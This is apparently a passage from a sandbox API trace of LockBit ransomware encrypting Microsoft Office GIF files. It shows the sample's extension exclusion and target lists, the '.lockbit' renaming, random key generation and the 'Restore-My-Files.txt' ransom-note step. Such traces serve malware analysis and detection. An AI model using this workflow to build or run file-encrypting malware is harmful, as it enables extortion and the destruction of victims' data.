[0203.351] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.351] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.351] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF.lockbit") returned 78 [0203.351] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14754_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.353] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.353] malloc (_Size=0x40068) returned 0x3df0008 [0203.353] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=176) returned 1 [0203.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.353] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.356] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.356] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.357] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.357] free (_Block=0x1fa2ed8) [0203.357] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14754_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.357] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.357] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.357] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fd2f700, ftCreationTime.dwHighDateTime=0x1bd4f43, ftLastAccessTime.dwLowDateTime=0xbc99e5c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2fd2f700, ftLastWriteTime.dwHighDateTime=0x1bd4f43, nFileSizeHigh=0x0, nFileSizeLow=0x44, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14755_.GIF", cAlternateFileName="")) returned 1 [0203.357] lstrcmpiW (lpString1=".", lpString2="BD14755_.GIF") returned -1 [0203.357] lstrcmpiW (lpString1="..", lpString2="BD14755_.GIF") returned -1 [0203.357] PathFindExtensionW (pszPath="BD14755_.GIF") returned=".GIF" [0203.357] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.357] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.357] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.358] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.358] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.358] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.358] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14755_.GIF") returned 1 [0203.358] lstrcmpiW (lpString1="ntldr", lpString2="BD14755_.GIF") returned 1 [0203.358] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14755_.GIF") returned 1 [0203.358] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14755_.GIF") returned 1 [0203.358] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14755_.GIF") returned -1 [0203.358] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14755_.GIF") returned 1 [0203.358] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14755_.GIF") returned 1 [0203.358] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.358] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF") returned=".GIF" [0203.358] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.358] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.359] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.359] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.359] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF.lockbit") returned 78 [0203.359] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14755_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.360] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.360] malloc (_Size=0x40068) returned 0x3df0008 [0203.360] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=68) returned 1 [0203.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.361] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.361] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.361] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.364] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.364] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.364] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.365] free (_Block=0x1fa2ed8) [0203.365] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14755_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.365] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.365] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedddae00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc99e5c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xedddae00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xbf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14756_.GIF", cAlternateFileName="")) returned 1 [0203.365] lstrcmpiW (lpString1=".", lpString2="BD14756_.GIF") returned -1 [0203.365] lstrcmpiW (lpString1="..", lpString2="BD14756_.GIF") returned -1 [0203.365] PathFindExtensionW (pszPath="BD14756_.GIF") returned=".GIF" [0203.365] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.365] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.365] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.366] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.366] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.366] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.366] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14756_.GIF") returned 1 [0203.366] lstrcmpiW (lpString1="ntldr", lpString2="BD14756_.GIF") returned 1 [0203.366] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14756_.GIF") returned 1 [0203.366] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14756_.GIF") returned 1 [0203.366] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14756_.GIF") returned -1 [0203.366] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14756_.GIF") returned 1 [0203.366] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14756_.GIF") returned 1 [0203.366] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.366] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF") returned=".GIF" [0203.366] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.366] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.367] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.367] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.367] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF.lockbit") returned 78 [0203.367] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14756_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.369] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.369] malloc (_Size=0x40068) returned 0x3df0008 [0203.369] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=191) returned 1 [0203.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.370] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.370] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.370] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.373] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.373] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.373] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.373] free (_Block=0x1fa2ed8) [0203.373] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14756_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.374] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.374] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedddae00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc99e5c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xedddae00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14757_.GIF", cAlternateFileName="")) returned 1 [0203.374] lstrcmpiW (lpString1=".", lpString2="BD14757_.GIF") returned -1 [0203.374] lstrcmpiW (lpString1="..", lpString2="BD14757_.GIF") returned -1 [0203.374] PathFindExtensionW (pszPath="BD14757_.GIF") returned=".GIF" [0203.374] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.374] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.374] 